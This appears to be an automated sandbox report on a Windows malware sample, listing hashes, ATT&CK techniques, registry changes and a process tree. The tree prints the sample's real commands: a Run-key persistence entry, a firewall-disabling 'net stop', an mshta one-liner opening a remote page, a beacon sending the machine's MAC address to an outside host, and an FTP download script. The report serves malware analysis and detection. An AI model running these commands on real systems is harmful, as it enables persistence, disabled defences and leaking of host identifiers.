90b374df6f4c9aaa154725e22e6911f0287a635b86efe279f61e1054ae1f974c

Analysis

max time kernel
134s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 07:54

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe
Size

5KB
MD5

1a82a2e23fd59812ec40714b642513ae
SHA1

ad7386aaf24b7a13b13b9f9e31971e8d351ddc63
SHA256

90b374df6f4c9aaa154725e22e6911f0287a635b86efe279f61e1054ae1f974c
SHA512

a8dd64cbf625a8ea8b0270b02fdc2e983eea2436d8a8ff7ed37359514c9921879fbe374c46661eeb5341dd6b9195b15226b8c393420092e3b72d50da680a0ae0
SSDEEP

48:iOXBtySKJxZcZ+AZmaw3R0ochuZeY+Gxc8Ajjimfn07iQB6TcEXKjYMSSeJY8JTn:NfycZ+AWOochIB9VAqmvcyIEXe0eHFe

Score

10^/10

persistence upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://www.html520.cn/d002/yahooo.htm%22,0%29%28window.close%29

Signatures

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	mshta.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3748-0-0x0000000000400000-0x0000000000407000-memory.dmp	upx
behavioral2/memory/3748-83-0x0000000000400000-0x0000000000407000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\pop = "C:\\Windows\\help\\runauto.vbs"	reg.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\help\svchost.bat	cmd.exe
File opened for modification	C:\Windows\help\svchost.bat	cmd.exe
File created	C:\Windows\help\runauto.vbs	cmd.exe
File opened for modification	C:\Windows\help\runauto.vbs	cmd.exe
File created	C:\Windows\help\r.vbs	cmd.exe
File created	C:\Windows\help\internet.bat	cmd.exe
File opened for modification	C:\Windows\help\internet.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3488	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4232261266"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 708848fe8bcbda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{27C68E0E-377F-11EF-9D11-EA96628E18C9} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31116171"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31116171"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000092879b20bf700e4c81ff82d1ae3b8366000000000200000000001066000000010000200000001483abf60ed47d6e5054c9b4fec578d7890d87f2131f848fe8856beac1fec550000000000e80000000020000200000000d9c3e842110a66e62434bcc6c47593bc8770ef967110cf23611f408d0e4f86120000000c0467394315f474ab1de5949fe0bd8a3ff4256fe1883cfc5b1618836dbd7778b40000000cf86cb351d63749ccaa4ddf394551c8515271227a4e69cb2fd67341095907426d8a5417b0fb20ef722c65df8d2e73f137065a77b33210362064584ea10a53f88	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4231791754"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4232261266"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000092879b20bf700e4c81ff82d1ae3b8366000000000200000000001066000000010000200000003f5d9f37310c798f5fedec147a691cf6ab746a10209593d8c65688e72a707b60000000000e80000000020000200000000beeb833dc67c50f3c41fe29b0b0caf0dc20e99c8c5c7f8a6e8e67f2599f190320000000b5ffdc5eab1be55d7b572fd31ade0bda8d3e05dda4d19efb1b9d5ec62f076d1340000000628f51144bba9beca831d616e492150747d6d6a70155c4b5edeb67fd9fed28566387a631c79ecb29ce0be5e52189b2642bd451815a234f01443d63971df734d1	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31116171"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31116171"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 508d4ffe8bcbda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "426585448"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4231791754"	iexplore.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2380	reg.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4296	regedit.exe
3276	regedit.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1272	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1272	iexplore.exe
1272	iexplore.exe
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 3748 wrote to memory of 1484	3748	1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe	82
PID 3748 wrote to memory of 1484	3748	1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe	82
PID 3748 wrote to memory of 1484	3748	1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe	82
PID 1484 wrote to memory of 2380	1484	cmd.exe	84
PID 1484 wrote to memory of 2380	1484	cmd.exe	84
PID 1484 wrote to memory of 2380	1484	cmd.exe	84
PID 1484 wrote to memory of 4296	1484	cmd.exe	85
PID 1484 wrote to memory of 4296	1484	cmd.exe	85
PID 1484 wrote to memory of 4296	1484	cmd.exe	85
PID 1484 wrote to memory of 3276	1484	cmd.exe	86
PID 1484 wrote to memory of 3276	1484	cmd.exe	86
PID 1484 wrote to memory of 3276	1484	cmd.exe	86
PID 1484 wrote to memory of 4468	1484	cmd.exe	87
PID 1484 wrote to memory of 4468	1484	cmd.exe	87
PID 1484 wrote to memory of 4468	1484	cmd.exe	87
PID 4468 wrote to memory of 3488	4468	cmd.exe	88
PID 4468 wrote to memory of 3488	4468	cmd.exe	88
PID 4468 wrote to memory of 3488	4468	cmd.exe	88
PID 4468 wrote to memory of 3736	4468	cmd.exe	89
PID 4468 wrote to memory of 3736	4468	cmd.exe	89
PID 4468 wrote to memory of 3736	4468	cmd.exe	89
PID 1484 wrote to memory of 4644	1484	cmd.exe	90
PID 1484 wrote to memory of 4644	1484	cmd.exe	90
PID 1484 wrote to memory of 4644	1484	cmd.exe	90
PID 1484 wrote to memory of 4808	1484	cmd.exe	92
PID 1484 wrote to memory of 4808	1484	cmd.exe	92
PID 1484 wrote to memory of 4808	1484	cmd.exe	92
PID 4644 wrote to memory of 1272	4644	WScript.exe	93
PID 4644 wrote to memory of 1272	4644	WScript.exe	93
PID 1272 wrote to memory of 2816	1272	iexplore.exe	94
PID 1272 wrote to memory of 2816	1272	iexplore.exe	94
PID 1272 wrote to memory of 2816	1272	iexplore.exe	94
PID 4808 wrote to memory of 2360	4808	mshta.exe	95
PID 4808 wrote to memory of 2360	4808	mshta.exe	95
PID 1484 wrote to memory of 1608	1484	cmd.exe	96
PID 1484 wrote to memory of 1608	1484	cmd.exe	96
PID 1484 wrote to memory of 1608	1484	cmd.exe	96
PID 1608 wrote to memory of 4368	1608	net.exe	97
PID 1608 wrote to memory of 4368	1608	net.exe	97
PID 1608 wrote to memory of 4368	1608	net.exe	97
PID 1484 wrote to memory of 2824	1484	cmd.exe	98
PID 1484 wrote to memory of 2824	1484	cmd.exe	98
PID 1484 wrote to memory of 2824	1484	cmd.exe	98

C:\Users\Admin\AppData\Local\Temp\1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\240594765.bat
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1484
- - C:\Windows\SysWOW64\reg.exe
    reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d C:\Windows\help\runauto.vbs /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2380
- - C:\Windows\SysWOW64\regedit.exe
    Regedit /s tem.reg
    3⤵
    - Modifies registry class
    - Runs .reg file with regedit
    PID:4296
- - C:\Windows\SysWOW64\regedit.exe
    Regedit /s gai.reg
    3⤵
    - Runs .reg file with regedit
    PID:3276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4468
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:3488
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /c:"Physical Address"
      4⤵
      PID:3736
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\help\r.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.html520.cn/d002/count.asp?mac= EA:96:62:8E:18:C9&os=Windows_NT&ver=20090917
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1272
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:17410 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2816
- - C:\Windows\SysWOW64\mshta.exe
    mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://www.html520.cn/d002/yahooo.htm",0)(window.close)
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4808
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.html520.cn/d002/yahooo.htm
      4⤵
      Modifies Internet Explorer settings
      PID:2360
- - C:\Windows\SysWOW64\net.exe
    net stop sharedaccess
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sharedaccess
      4⤵
      PID:4368
- - C:\Windows\SysWOW64\ftp.exe
    ftp -s:C:\Windows\temp\DownFtp.tmp
    3⤵
    PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
4002e8b12817dfbab01588c4f44e6ee3

SHA1
cd4af5e44b05b1af7218bc8b2a002f471c480fa6

SHA256
cc39772f0b25c3383b5f2e37ff9b29bdbc27193366d8d6422a8f0b81801d6ab9

SHA512
b42ef3ac0dddb2563e6c4d5d49042d9da7a5f03718cbcc59d2025b842efd0b64fda490571459fdcfb49acc0b80f15edee68a510598fe60b0ae9151c01c615404

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
285f0b875c99582eefe3b6f97b43d4da

SHA1
4cafadf247c9e3c4645491b7ecf297d905d5c35e

SHA256
e8f8fed1e27ab8cd2ab3f04b7b81ec39eb5d69ce62bb69e9a99fa3ea9c42ed5f

SHA512
dcec2993ffbcebcd98de427404100eaefafc81ab3c32e8ba5138c5a6e61e4dbaa0c52ad56b490ca2eb5095ee878ab1dd3077ea001e3ecde00c817625c9d688e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verA8F2.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZRDQ3WBJ\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\240594765.bat

Filesize
6KB

MD5
b52ad45c6953ce9334130f6c43f67672

SHA1
04c1de8bcb915f4de344525356a8e0f35f831d6d

SHA256
70f4404c7d493276581d5eec55445538992dcfd2beebd6f5f14c9ce9ee9a2828

SHA512
be72a4121b1e433100ba2d649f3232841d4c256a0eaceb773ad45d72f3a09c6d1c5aaf2d7a5cf6cf3beec151569a912f4700a497bda33e822dd2744906067542

Download Submit
C:\Users\Admin\AppData\Local\Temp\gai.reg

Filesize
309B

MD5
8c9d7b6c427f4978944db6dcdf2905be

SHA1
8fb3eb9e98895a774fdd4f043205a2d7abf75ccd

SHA256
b70851b5596fc38203915b7803d6e6b96e2bfc4a99f7181418dc489bf4b290de

SHA512
8cfaa804ad8e58c8394d19d9a28b07e81c4ac52d2aaabb1eb1b16a97b6d52a4cda204f0d23557e83f9a1bfd906dec42d9cd8a88433cedd69e833ee9767508897

Download Submit
C:\Users\Admin\AppData\Local\Temp\tem.reg

Filesize
221B

MD5
22a029e2aec1c742e95832fcedae8d5d

SHA1
6a823850f8bbaa10917aabfd6d8925781aac70a6

SHA256
669c0291fd71f63f88b766ae9a0fda782f4b3055909b0298aaec97a674d44bd8

SHA512
1a7a1bcf36bff8842d03f53de7eb50e874b186ef110919ed8ceddc5117c5177e2101427133b87afb679d08934b1f591afa7a55eafe0fe89cbf05f963f89a7b8d

Download Submit
C:\Users\Admin\Favorites\115┐ß╡╝║╜ ╔╧═°╛═╔╧115┐ß╡╝║╜.url

Filesize
131B

MD5
de355dc43eebcd04f5c170b5c224145e

SHA1
9d02d0a1e4c29ea0e8078c6fcfb2007a885baac1

SHA256
fe2510b5fa7ee798eae31e486f7480c358d1c7ffe9cd0cb44ae8914a9da4c087

SHA512
5626c7ec7f089c884b848c225b78d2088201658c7d197fdc0c973254283f097a35dbe61b6da5079726597f7754bb65f6e4bd6b77faba55a1118ee2766276208d

Download Submit
C:\Windows\help\r.vbs

Filesize
136B

MD5
0a6d8d754250fe09ad501b0e59b6198f

SHA1
741ae97de976ad3eae5ab2cc686e456bc99f5db3

SHA256
8080644a375bef2bd00d2bddcda50ef4ab38ca659f49eda650e955c6b660bdd9

SHA512
c89e5d726bbc4f144a5ec7a123421f91d342769d1491bc8e4ea4d365201eef20866bede80f1eda29097b8abcfec6b930cf694f66a2efb1c108b53ac298ad1491

Download Submit
C:\Windows\temp\DownFtp.tmp

Filesize
279B

MD5
3bacb412a3c9b5d5070c7cdf08d58889

SHA1
e2ea2de79c6abd89249dee0775596d92dcb57f82

SHA256
ec94b9ff0393e0fc49a9a85370d552d2e6b49017baa26b768350489925001e12

SHA512
31224dd29f66ad17d348bfdf7d12145f5202e461494a37458975bc61ab1825569b183ebc0173d2a512bcb17e1c6bf7de33e707fd42a0226f4037e7ff2227d023

Download Submit
memory/3748-0-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/3748-83-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads